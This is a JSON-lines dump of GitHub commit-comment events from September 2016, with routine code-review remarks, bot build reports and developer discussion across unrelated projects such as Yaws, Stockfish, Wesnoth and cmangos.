{"id":"4612616943","type":"CommitCommentEvent","actor":{"login":"Ummon"},"repo":{"name":"klacke/yaws"},"payload":{"comment":{"id":19158303,"position":null,"line":null,"path":null,"commit_id":"3364e06d56e9bc9261ec3b2e63b4323af4aaeac9","created_at":"2016-09-24T14:33:13Z","updated_at":"2016-09-24T14:33:13Z","body":"Actually, I have something like that and I don't know how to replace it because you can't include a yaws file ({yssi, ...}) into a {html, ...} markup:\r\n\r\n```xml\r\n      <div id=\"content-bg\">\r\n         <div id=\"content\" class=\"<erl>\r\n            out(A) ->\r\n               {html, atom_to_list(d_lan_common:current_page(A))}.\r\n         </erl>\">\r\n            <erl>\r\n               out(A) ->\r\n                  {yssi, atom_to_list(d_lan_common:current_page(A)) ++ \".yaws\"}.\r\n            </erl>\r\n         </div>\r\n      </div>\r\n```"}},"created_at":"2016-09-24T14:33:13Z"}
{"id":"4612618229","type":"CommitCommentEvent","actor":{"login":"amura2406"},"repo":{"name":"amura2406/babe_content_ms"},"payload":{"comment":{"id":19158305,"position":null,"line":null,"path":null,"commit_id":"cc35d6076244a14450b2cfd3d1802c3ae30e532d","created_at":"2016-09-24T14:34:10Z","updated_at":"2016-09-24T14:34:10Z","body":"__API Description file syntax error on line 190__: base type 'String' is not defined in the document (Autogenerated message from apiary.io)"}},"created_at":"2016-09-24T14:34:10Z"}
{"id":"4612621023","type":"CommitCommentEvent","actor":{"login":"jsoranno"},"repo":{"name":"SnapSnax/webapp"},"payload":{"comment":{"id":19158312,"position":null,"line":null,"path":null,"commit_id":"2b0f187a877f23458a4d91989053aad0977c5d1c","created_at":"2016-09-24T14:36:10Z","updated_at":"2016-09-24T14:36:10Z","body":"lgtm"}},"created_at":"2016-09-24T14:36:10Z"}
{"id":"4612621268","type":"CommitCommentEvent","actor":{"login":"edgarborja"},"repo":{"name":"edgarborja/PokemonGo-Map"},"payload":{"comment":{"id":19158313,"position":null,"line":null,"path":null,"commit_id":"2750e5252f7c557813a2246330e3ecbb3eca6042","created_at":"2016-09-24T14:36:19Z","updated_at":"2016-09-24T14:36:19Z","body":"Fixed not showing lured pokemon"}},"created_at":"2016-09-24T14:36:19Z"}
{"id":"4612625435","type":"CommitCommentEvent","actor":{"login":"Wndrr"},"repo":{"name":"Wndrr/Ponteilla"},"payload":{"comment":{"id":19158321,"position":null,"line":null,"path":null,"commit_id":"58e3a701cd948ba4b39b05fe5d3e839e2fb5b0d6","created_at":"2016-09-24T14:39:20Z","updated_at":"2016-09-24T14:39:20Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Switch to - Bower](https://trello.com/c/f71jF64j/17-switch-to-bower)"}},"created_at":"2016-09-24T14:39:20Z"}
{"id":"4612626120","type":"CommitCommentEvent","actor":{"login":"freekh"},"repo":{"name":"poud/Learn"},"payload":{"comment":{"id":19158322,"position":null,"line":null,"path":null,"commit_id":"ef7a0f23d5d4aba51147b599c338a8d18feba9af","created_at":"2016-09-24T14:39:50Z","updated_at":"2016-09-24T14:39:50Z","body":":+1:"}},"created_at":"2016-09-24T14:39:50Z"}
{"id":"4612627052","type":"CommitCommentEvent","actor":{"login":"forteddyt"},"repo":{"name":"forteddyt/ProgrammingComps"},"payload":{"comment":{"id":19158332,"position":37,"line":37,"path":"HackerRank/Algorithms/Implementation/Bigger_is_Greater.java","commit_id":"7fcafb53a27ef9f67c17637ef07dbb901e69278c","created_at":"2016-09-24T14:40:27Z","updated_at":"2016-09-24T14:40:27Z","body":"Replace with System exit"}},"created_at":"2016-09-24T14:40:27Z"}
{"id":"4612628696","type":"CommitCommentEvent","actor":{"login":"s4980"},"repo":{"name":"s4980/grafana-api"},"payload":{"comment":{"id":19158338,"position":9,"line":null,"path":"pom.xml","commit_id":"f3e64274fcc3de8868d03ee28d855dd8eccc8748","created_at":"2016-09-24T14:41:37Z","updated_at":"2016-09-24T14:41:37Z","body":"test comment from SmartGit"}},"created_at":"2016-09-24T14:41:37Z"}
{"id":"4612628753","type":"CommitCommentEvent","actor":{"login":"freekh"},"repo":{"name":"poud/Learn"},"payload":{"comment":{"id":19158339,"position":null,"line":null,"path":null,"commit_id":"ef7a0f23d5d4aba51147b599c338a8d18feba9af","created_at":"2016-09-24T14:41:39Z","updated_at":"2016-09-24T14:41:39Z","body":"Ser veldig bra ut! Du kunne jo ha brukt name variablen til noe også (f.eks. på linja over :)"}},"created_at":"2016-09-24T14:41:39Z"}
{"id":"4612630021","type":"CommitCommentEvent","actor":{"login":"benwbrum"},"repo":{"name":"benwbrum/fromthepage"},"payload":{"comment":{"id":19158342,"position":8,"line":60,"path":"app/controllers/collection_controller.rb","commit_id":"983a23acd4e3f700a1b0dac14a8522e383285ce2","created_at":"2016-09-24T14:42:36Z","updated_at":"2016-09-24T14:42:36Z","body":"@tbl73 We have to remove the binding.pry here.  (In fact, we should probably look into git hooks to prevent code with `binding.pry` from being pushed, since @saracarl and I do it all the time too.)"}},"created_at":"2016-09-24T14:42:36Z"}
{"id":"4612630539","type":"CommitCommentEvent","actor":{"login":"BALRR"},"repo":{"name":"BALRRHUB/BALRR"},"payload":{"comment":{"id":19158343,"position":null,"line":null,"path":null,"commit_id":"b265ee597b3b35761d6c5c426bb7f191cadfe7e5","created_at":"2016-09-24T14:42:59Z","updated_at":"2016-09-24T14:42:59Z","body":"[woocommerce-admin-theme-for-shop-manager.zip](https://github.com/BALRRHUB/BALRR/files/491174/woocommerce-admin-theme-for-shop-manager.zip)\r\n"}},"created_at":"2016-09-24T14:42:59Z"}
{"id":"4612630950","type":"CommitCommentEvent","actor":{"login":"hownowbrowncow"},"repo":{"name":"hownowbrowncow/website"},"payload":{"comment":{"id":19158347,"position":5,"line":4,"path":"README.md","commit_id":"67e724fff69b30a69f22cfb5d5fbb95f3c6a9217","created_at":"2016-09-24T14:43:16Z","updated_at":"2016-09-24T14:43:16Z","body":"test comment"}},"created_at":"2016-09-24T14:43:16Z"}
{"id":"4612632384","type":"CommitCommentEvent","actor":{"login":"linkerlin"},"repo":{"name":"beykery/jkcp"},"payload":{"comment":{"id":19158352,"position":null,"line":null,"path":null,"commit_id":"d923d298277e47718b3f32a2b0fbbacac4b184b5","created_at":"2016-09-24T14:44:16Z","updated_at":"2016-09-24T14:44:16Z","body":"我觉得可以搞个定时器来释放Segment。\r\n因为每个Segment的最长存活时间大约也就是10s钟吧。\r\n这样子就不用那么那么麻烦了，分配Segment的时候创建定时任务，10s后释放即可。"}},"created_at":"2016-09-24T14:44:16Z"}
{"id":"4612633043","type":"CommitCommentEvent","actor":{"login":"flash-gordon"},"repo":{"name":"rom-rb/rom-sql"},"payload":{"comment":{"id":19158355,"position":null,"line":null,"path":null,"commit_id":"5ea5946f3a59f363bc51c125cebf48e09ce970f4","created_at":"2016-09-24T14:44:48Z","updated_at":"2016-09-24T14:44:48Z","body":"@solnic ok, done"}},"created_at":"2016-09-24T14:44:48Z"}
{"id":"4612634794","type":"CommitCommentEvent","actor":{"login":"Frankenstone"},"repo":{"name":"fs-basis/neutrino-mp-cst-next"},"payload":{"comment":{"id":19158362,"position":null,"line":null,"path":null,"commit_id":"db0d3d6607f7a3b5ec7b0145320f03ff1fc5e533","created_at":"2016-09-24T14:46:07Z","updated_at":"2016-09-24T14:46:07Z","body":"Segfault theme change ... hmm.."}},"created_at":"2016-09-24T14:46:07Z"}
{"id":"4612634881","type":"CommitCommentEvent","actor":{"login":"deadlyraptor"},"repo":{"name":"deadlyraptor/box-office-tracker"},"payload":{"comment":{"id":19158363,"position":26,"line":35,"path":"app.py","commit_id":"c493156c445a37ad07c2bb9d2feb425f3ba66591","created_at":"2016-09-24T14:46:10Z","updated_at":"2016-09-24T14:46:10Z","body":"Didn't think about that. I guess I could just pass the class attributes instead of trying to return a row from the table."}},"created_at":"2016-09-24T14:46:10Z"}
{"id":"4612635388","type":"CommitCommentEvent","actor":{"login":"IndieLightAndMagic"},"repo":{"name":"julianguarinautoformax/autofmx-afmxdec"},"payload":{"comment":{"id":19158366,"position":null,"line":null,"path":null,"commit_id":"8782b186f2b53233fd9890ff833a666f8df68e25","created_at":"2016-09-24T14:46:32Z","updated_at":"2016-09-24T14:46:32Z","body":"This was the first approximation on json decoding utility. My first serious try on doing something with go. \r\n\r\n"}},"created_at":"2016-09-24T14:46:32Z"}
{"id":"4612636559","type":"CommitCommentEvent","actor":{"login":"tbirand"},"repo":{"name":"EditionGuard/WooCommerce-Plugin"},"payload":{"comment":{"id":19158371,"position":null,"line":null,"path":null,"commit_id":"b3429c9a6d1921d39a8adaa15e2c8651826518aa","created_at":"2016-09-24T14:47:23Z","updated_at":"2016-09-24T14:47:23Z","body":"@vlad0209 Thank you. "}},"created_at":"2016-09-24T14:47:23Z"}
{"id":"4612636685","type":"CommitCommentEvent","actor":{"login":"jyrkive"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19158373,"position":null,"line":null,"path":null,"commit_id":"16c1b86443214340faf6f45702bac164b8cdaa34","created_at":"2016-09-24T14:47:29Z","updated_at":"2016-09-24T14:47:29Z","body":"Even if it was possible, it's easier to just read the metadata manually. ~35 tracks isn't that many."}},"created_at":"2016-09-24T14:47:29Z"}
{"id":"4612636818","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19158374,"position":null,"line":null,"path":null,"commit_id":"0e914aa27f8a22058be58e5d9ad1800df7792708","created_at":"2016-09-24T14:47:37Z","updated_at":"2016-09-24T14:47:37Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0e914aa27f8a22058be58e5d9ad1800df7792708-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0e914aa27f8a22058be58e5d9ad1800df7792708-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-24T14:47:37Z"}
{"id":"4612636833","type":"CommitCommentEvent","actor":{"login":"benwbrum"},"repo":{"name":"benwbrum/fromthepage"},"payload":{"comment":{"id":19158375,"position":5,"line":57,"path":"app/controllers/collection_controller.rb","commit_id":"983a23acd4e3f700a1b0dac14a8522e383285ce2","created_at":"2016-09-24T14:47:37Z","updated_at":"2016-09-24T14:47:37Z","body":"Rather than adding owners to the scribes list, I think we should fix the logic in [user.can_transcribe?](https://github.com/benwbrum/fromthepage/blob/master/app/models/user.rb#L50) to replace `self == work.owner` with `self.like_owner?(work)`.  This work owner/collection owner/colllection uploader mess needs constant pruning, it seems."}},"created_at":"2016-09-24T14:47:37Z"}
{"id":"4612638166","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19158378,"position":null,"line":null,"path":null,"commit_id":"222ee920199edfc1ffad9e39e09bdcacb90fac78","created_at":"2016-09-24T14:48:33Z","updated_at":"2016-09-24T14:48:33Z","body":"129956735-WaterHeaterHeight (Myoldmopar) - i386-Windows-7-VisualStudio-12: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-222ee920199edfc1ffad9e39e09bdcacb90fac78-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-222ee920199edfc1ffad9e39e09bdcacb90fac78-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-24T14:48:33Z"}
{"id":"4612638936","type":"CommitCommentEvent","actor":{"login":"jyrkive"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19158380,"position":null,"line":null,"path":null,"commit_id":"b6c7273fb5d1e513a9ad707ced4a0ce12d655b4a","created_at":"2016-09-24T14:49:07Z","updated_at":"2016-09-24T14:49:07Z","body":"I wouldn't say that it's your fault. You improved the code, and that improvement allowed MSVC to warn about code that had always been unreachable. 👍 "}},"created_at":"2016-09-24T14:49:07Z"}
{"id":"4612640195","type":"CommitCommentEvent","actor":{"login":"prodansergiu"},"repo":{"name":"ok2c/httpcore"},"payload":{"comment":{"id":19158383,"position":17,"line":193,"path":"httpcore/src/main/java/org/apache/http/pool/AbstractConnPool.java","commit_id":"b1e6ec7b80efced8e315b722a734c178ab19697a","created_at":"2016-09-24T14:49:58Z","updated_at":"2016-09-24T14:49:58Z","body":"It seems that PoolEntryFuture#getPoolEntry is called inside a region protected by the same lock used in AbstractConnPool. See PoolEntryFuture#get"}},"created_at":"2016-09-24T14:49:58Z"}
{"id":"4612641237","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19158385,"position":null,"line":null,"path":null,"commit_id":"df7f50992c70182abf80a77433eeaea2ce3e1cd6","created_at":"2016-09-24T14:50:41Z","updated_at":"2016-09-24T14:50:41Z","body":"Here an example still from bench-position pos # 1 which affects the return value of SEE:\r\n\r\n```\r\n +---+---+---+---+---+---+---+---+\r\n | r | n | b | q | k | b |   | r |\r\n +---+---+---+---+---+---+---+---+\r\n | p | p | p |   | p |   |   | p |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   |   | n | P |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   | p |   |   |   | Q |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n | P | P | P | P |   | P | P | P |\r\n +---+---+---+---+---+---+---+---+\r\n | R | N | B |   | K | B | N | R |\r\n +---+---+---+---+---+---+---+---+\r\n\r\nFen: rnbqkb1r/ppp1p2p/5nP1/3p3Q/8/8/PPPP1PPP/RNB1KBNR w KQkq - 1 5\r\nKey: C9E301F2AA0FE4F2\r\n```\r\nHere our last implementations thought that after Qxh7 Rxh7 gxh7 there's a discovered check which prevents the Night taking back at h7and SEE returned -1760. \r\nThis implementation lets the Night on f6 correctly take back and the return value is -1572.\r\n\r\nThat said I hope that the real benefit of this patch is handling also discoverings by pawn/king always correctly and fast. Unfortunately I can't make any speed-test during weekend."}},"created_at":"2016-09-24T14:50:41Z"}
{"id":"4612642307","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19158388,"position":null,"line":null,"path":null,"commit_id":"222ee920199edfc1ffad9e39e09bdcacb90fac78","created_at":"2016-09-24T14:51:17Z","updated_at":"2016-09-24T14:51:17Z","body":"129956735-WaterHeaterHeight (Myoldmopar) - Win64-Windows-7-VisualStudio-12: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-222ee920199edfc1ffad9e39e09bdcacb90fac78-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-222ee920199edfc1ffad9e39e09bdcacb90fac78-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-24T14:51:17Z"}
{"id":"4612642609","type":"CommitCommentEvent","actor":{"login":"dinosaadeh"},"repo":{"name":"dinosaadeh/Barjis"},"payload":{"comment":{"id":19158390,"position":19,"line":439,"path":"core/src/com/smb215team/barjis/game/GameController.java","commit_id":"91d4e7be9eb16f6a7082ac0795d2ce2441523fcf","created_at":"2016-09-24T14:51:31Z","updated_at":"2016-09-24T14:51:31Z","body":"ouch.. these need to be decoupled!"}},"created_at":"2016-09-24T14:51:31Z"}
{"id":"4612643452","type":"CommitCommentEvent","actor":{"login":"jyrkive"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19158393,"position":null,"line":null,"path":null,"commit_id":"b98f8aab7c48cec1469aac443d37ab1e0503f292","created_at":"2016-09-24T14:52:10Z","updated_at":"2016-09-24T14:52:10Z","body":"Sorting the filters is unnecessary IMO. But it isn't exactly harmful, so you can continue to sort them if you want.\r\n\r\n@CelticMinstrel Yes, MSVC always displays the filters in alphabetical order, regardless of the file order."}},"created_at":"2016-09-24T14:52:10Z"}
{"id":"4612644141","type":"CommitCommentEvent","actor":{"login":"Wndrr"},"repo":{"name":"Wndrr/Ponteilla"},"payload":{"comment":{"id":19158398,"position":null,"line":null,"path":null,"commit_id":"4f948ea0e14eee529f0551e67a1549c2254457f8","created_at":"2016-09-24T14:52:40Z","updated_at":"2016-09-24T14:52:40Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Contact form - Add loader](https://trello.com/c/OWVkBJKQ/55-contact-form-add-loader)"}},"created_at":"2016-09-24T14:52:40Z"}
{"id":"4612644888","type":"CommitCommentEvent","actor":{"login":"physicien"},"repo":{"name":"alexylem/jarvis"},"payload":{"comment":{"id":19158401,"position":null,"line":null,"path":null,"commit_id":"eda4ddf10803f4304c79cb4e381fcc664d5981bd","created_at":"2016-09-24T14:53:11Z","updated_at":"2016-09-24T14:53:11Z","body":"Juste comme ça, j'ai remarqué que la commande de base entre en conflit avec la nouvelle commande météo. Il faudrait peut-être faire qu'elle soit retirée du jarvis-commands."}},"created_at":"2016-09-24T14:53:11Z"}
{"id":"4612645507","type":"CommitCommentEvent","actor":{"login":"RealyUniqueName"},"repo":{"name":"RealyUniqueName/haxe"},"payload":{"comment":{"id":19158407,"position":null,"line":null,"path":null,"commit_id":"d0d7b331e6d07b2c9736c2bd3cd79e6076ad68f7","created_at":"2016-09-24T14:53:39Z","updated_at":"2016-09-24T14:53:39Z","body":"> Do I miss something?\r\nYou do )\r\nparseInt:\r\n```\r\nLeading whitespaces are ignored.\r\n\r\nIf x starts with 0x or 0X, hexadecimal notation is recognized where the following digits may contain 0-9 and A-F.\r\n\r\nOtherwise x is read as decimal number with 0-9 being allowed characters. x may also start with a - to denote a negative value.\r\n\r\nIn decimal mode, parsing continues until an invalid character is detected, in which case the result up to that point is returned. For hexadecimal notation, the effect of invalid characters is unspecified.\r\n\r\nLeading 0s that are not part of the 0x/0X hexadecimal notation are ignored, which means octal notation is not supported.\r\n\r\nIf the input cannot be recognized, the result is null.\r\n```\r\nparseFloat:\r\n```\r\nhe parsing rules for parseInt apply here as well, with the exception of invalid input resulting in a NaN value instead of null.\r\n\r\nAdditionally, decimal notation may contain a single . to denote the start of the fractions.\r\n```"}},"created_at":"2016-09-24T14:53:39Z"}
{"id":"4612647005","type":"CommitCommentEvent","actor":{"login":"hownowbrowncow"},"repo":{"name":"astoellis/material-timepicker"},"payload":{"comment":{"id":19158410,"position":4,"line":5,"path":"src/js/template.js","commit_id":"23fc06386c2e40690f675edf7ebf23a976b17f34","created_at":"2016-09-24T14:54:48Z","updated_at":"2016-09-24T14:54:48Z","body":":+1: Good solution. Do you plan on submitting a pull request for your work at some point? I'm in no rush, I've hardly touched the project in months. But I plan on doing some work on it over the next few weeks so I'd like to use this solution."}},"created_at":"2016-09-24T14:54:48Z"}
{"id":"4612647851","type":"CommitCommentEvent","actor":{"login":"alexylem"},"repo":{"name":"alexylem/jarvis"},"payload":{"comment":{"id":19158414,"position":null,"line":null,"path":null,"commit_id":"eda4ddf10803f4304c79cb4e381fcc664d5981bd","created_at":"2016-09-24T14:55:23Z","updated_at":"2016-09-24T14:55:23Z","body":"Oui je l'ai déjà enlevé de `jarvis-commands.default` (utilisé à l'installation) mais je ne peux pas l'enlever des commandes des utilisateurs. Il faut que vous le fassiez vous-même 😄 "}},"created_at":"2016-09-24T14:55:23Z"}
{"id":"4612649630","type":"CommitCommentEvent","actor":{"login":"Warlockbugs"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":19158421,"position":4,"line":9984,"path":"src/game/Unit.cpp","commit_id":"a16b6e58801e1e0a1d253a86378d646b339bd9d4","created_at":"2016-09-24T14:56:43Z","updated_at":"2016-09-24T14:56:43Z","body":"Dead warlock pets should despawn after 5 seconds (not implemented yet), not sure about temporary summons. For channeled spells (like Eye of Kilrogg) its instant AFAIK."}},"created_at":"2016-09-24T14:56:43Z"}
{"id":"4612649693","type":"CommitCommentEvent","actor":{"login":"alexylem"},"repo":{"name":"alexylem/jarvis"},"payload":{"comment":{"id":19158422,"position":null,"line":null,"path":null,"commit_id":"eda4ddf10803f4304c79cb4e381fcc664d5981bd","created_at":"2016-09-24T14:56:45Z","updated_at":"2016-09-24T14:56:45Z","body":"en fait je pensais l'avoir fait mais non, voila c'est committé."}},"created_at":"2016-09-24T14:56:45Z"}
{"id":"4612650433","type":"CommitCommentEvent","actor":{"login":"physicien"},"repo":{"name":"alexylem/jarvis"},"payload":{"comment":{"id":19158425,"position":null,"line":null,"path":null,"commit_id":"eda4ddf10803f4304c79cb4e381fcc664d5981bd","created_at":"2016-09-24T14:57:19Z","updated_at":"2016-09-24T14:57:19Z","body":"Est-ce qu'il y a d'autres commandes comme ça qu'on doit retirer manuellement?"}},"created_at":"2016-09-24T14:57:19Z"}
{"id":"4612651186","type":"CommitCommentEvent","actor":{"login":"robinsch"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":19158427,"position":4,"line":9984,"path":"src/game/Unit.cpp","commit_id":"a16b6e58801e1e0a1d253a86378d646b339bd9d4","created_at":"2016-09-24T14:57:52Z","updated_at":"2016-09-24T14:57:52Z","body":"Water elemental should also despawn after 5 seconds."}},"created_at":"2016-09-24T14:57:52Z"}
{"id":"4612651217","type":"CommitCommentEvent","actor":{"login":"ghsr"},"repo":{"name":"daneal2u/android_device_samsung_i9082"},"payload":{"comment":{"id":19158428,"position":null,"line":null,"path":null,"commit_id":"3aff4a2599666040d159698c96e826697cca0db3","created_at":"2016-09-24T14:57:53Z","updated_at":"2016-09-24T14:57:53Z","body":"Not only PRODUCT_AAPT_CONFIG, also remove PRODUCT_AAPT_PREF_CONFIG. Just revert https://github.com/daneal2u/android_device_samsung_i9082/commit/8bf103746c6c332bce3fdd1e8e98a28727c6a091\r\nro.sf.lcd_density=240 we already have in system_prop.mk"}},"created_at":"2016-09-24T14:57:53Z"}
{"id":"4612651318","type":"CommitCommentEvent","actor":{"login":"alexylem"},"repo":{"name":"alexylem/jarvis"},"payload":{"comment":{"id":19158429,"position":null,"line":null,"path":null,"commit_id":"eda4ddf10803f4304c79cb4e381fcc664d5981bd","created_at":"2016-09-24T14:57:58Z","updated_at":"2016-09-24T14:57:58Z","body":"Oui, la commande pour demander la date et l'heure, c'est dans un plugin maintenant."}},"created_at":"2016-09-24T14:57:58Z"}
{"id":"4612654304","type":"CommitCommentEvent","actor":{"login":"moeroach94"},"repo":{"name":"appacademy/jump-start"},"payload":{"comment":{"id":19158433,"position":5,"line":27,"path":"jumpstart-files/practice_assessments/practice_assessment_1.rb","commit_id":"193b195ccbdb0097e7adcd7199cbee03c4583787","created_at":"2016-09-24T14:59:59Z","updated_at":"2016-09-24T14:59:59Z","body":"I think it was spelt properly before lol"}},"created_at":"2016-09-24T14:59:59Z"}
{"id":"4612654571","type":"CommitCommentEvent","actor":{"login":"updateing"},"repo":{"name":"updateing/android_device_oneplus_bacon"},"payload":{"comment":{"id":19158434,"position":null,"line":null,"path":null,"commit_id":"9759ad6d7133f5d28f111817a7816839621a2f15","created_at":"2016-09-24T15:00:09Z","updated_at":"2016-09-24T15:00:09Z","body":"CM has it here https://github.com/CyanogenMod/android_device_oneplus_bacon/blob/cae9cb7e537a51a232e8b00e3db1acf1a9e8ac54/BoardConfig.mk#L133"}},"created_at":"2016-09-24T15:00:09Z"}
{"id":"4612655624","type":"CommitCommentEvent","actor":{"login":"physicien"},"repo":{"name":"alexylem/jarvis"},"payload":{"comment":{"id":19158437,"position":null,"line":null,"path":null,"commit_id":"eda4ddf10803f4304c79cb4e381fcc664d5981bd","created_at":"2016-09-24T15:00:45Z","updated_at":"2016-09-24T15:00:45Z","body":"Ok, merci. Je remarque également que la date est affichée en anglais, est-ce normal?"}},"created_at":"2016-09-24T15:00:45Z"}
{"id":"4612656349","type":"CommitCommentEvent","actor":{"login":"TheoSabattie"},"repo":{"name":"RealyUniqueName/haxe"},"payload":{"comment":{"id":19158440,"position":null,"line":null,"path":null,"commit_id":"d0d7b331e6d07b2c9736c2bd3cd79e6076ad68f7","created_at":"2016-09-24T15:01:15Z","updated_at":"2016-09-24T15:01:15Z","body":"Indeed, I forgot a lot of things !\r\nThanks for explanations. :)"}},"created_at":"2016-09-24T15:01:15Z"}
{"id":"4612659684","type":"CommitCommentEvent","actor":{"login":"rtconner"},"repo":{"name":"rtconner/laravel-tagging"},"payload":{"comment":{"id":19158451,"position":null,"line":null,"path":null,"commit_id":"72ff761eafc30b4f8a58ef292de353e8ad26913a","created_at":"2016-09-24T15:03:33Z","updated_at":"2016-09-24T15:03:33Z","body":"I guess I just forgot. Sorry, release is made."}},"created_at":"2016-09-24T15:03:33Z"}
{"id":"4612660499","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19158454,"position":null,"line":null,"path":null,"commit_id":"df7f50992c70182abf80a77433eeaea2ce3e1cd6","created_at":"2016-09-24T15:04:06Z","updated_at":"2016-09-24T15:04:06Z","body":"And here for completeness 2 positions with pawn moving from a dc-candidate square,\r\nthe first get correctly recognized as discovering check\r\n\r\n```\r\n +---+---+---+---+---+---+---+---+\r\n | r | n | b |   | k | b | n | r |\r\n +---+---+---+---+---+---+---+---+\r\n | p | p | p |   | q | p | p | p |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   | P | p |   | N |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n | P | P | P |   |   | P | P | P |\r\n +---+---+---+---+---+---+---+---+\r\n | R | N | B | Q | K | B |   | R |\r\n +---+---+---+---+---+---+---+---+\r\n\r\nFen: rnb1kbnr/ppp1qppp/8/8/3Pp1N1/8/PPP2PPP/RNBQKB1R b KQkq d3 0 5\r\nKey: 17C7E55E586E8832\r\n```\r\nPawn e4 captures d4 en passant and it's discovered check by the black Queen.\r\n\r\n..and the second one where this patch recognizes properly that the move is'nt discovering a check\r\n```\r\n +---+---+---+---+---+---+---+---+\r\n | r |   | b | q | k | b | n | r |\r\n +---+---+---+---+---+---+---+---+\r\n | p | p | p | p |   | p | p | p |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   | n |   |   | P |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   | Q |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n | P | P | P |   |   | P | P | P |\r\n +---+---+---+---+---+---+---+---+\r\n | R | N | B |   | K | B | N | R |\r\n +---+---+---+---+---+---+---+---+\r\n\r\nFen: r1bqkbnr/pppp1ppp/8/8/1n2P3/4Q3/PPP2PPP/RNB1KBNR w KQkq - 3 5\r\nKey: 7BB9E724FB64B998\r\n```\r\nHere the pawn by moving e4e5 does leave a discovering check candide square but it's no disc. check at all."}},"created_at":"2016-09-24T15:04:06Z"}
{"id":"4612660904","type":"CommitCommentEvent","actor":{"login":"andry-tino"},"repo":{"name":"andry-tino/inet"},"payload":{"comment":{"id":19158456,"position":null,"line":null,"path":null,"commit_id":"cbd1747d92df26875764b8736fd49efcef3ae6a9","created_at":"2016-09-24T15:04:22Z","updated_at":"2016-09-24T15:04:22Z","body":"With this pack, ping-pong works fine in legacy configuration."}},"created_at":"2016-09-24T15:04:22Z"}
{"id":"4612661675","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":19158458,"position":4,"line":9984,"path":"src/game/Unit.cpp","commit_id":"a16b6e58801e1e0a1d253a86378d646b339bd9d4","created_at":"2016-09-24T15:04:54Z","updated_at":"2016-09-24T15:04:54Z","body":"This has to do with CORPSE despawn. summons such as the warlock pets and water elementals don't have corpses at all."}},"created_at":"2016-09-24T15:04:54Z"}
{"id":"4612663756","type":"CommitCommentEvent","actor":{"login":"robinsch"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":19158465,"position":4,"line":9984,"path":"src/game/Unit.cpp","commit_id":"a16b6e58801e1e0a1d253a86378d646b339bd9d4","created_at":"2016-09-24T15:06:23Z","updated_at":"2016-09-24T15:06:23Z","body":"do you mean from a internal point or ingame? If you refer to ingame you are wrong, they have a death animation and also a dead corpse laying on ground."}},"created_at":"2016-09-24T15:06:23Z"}
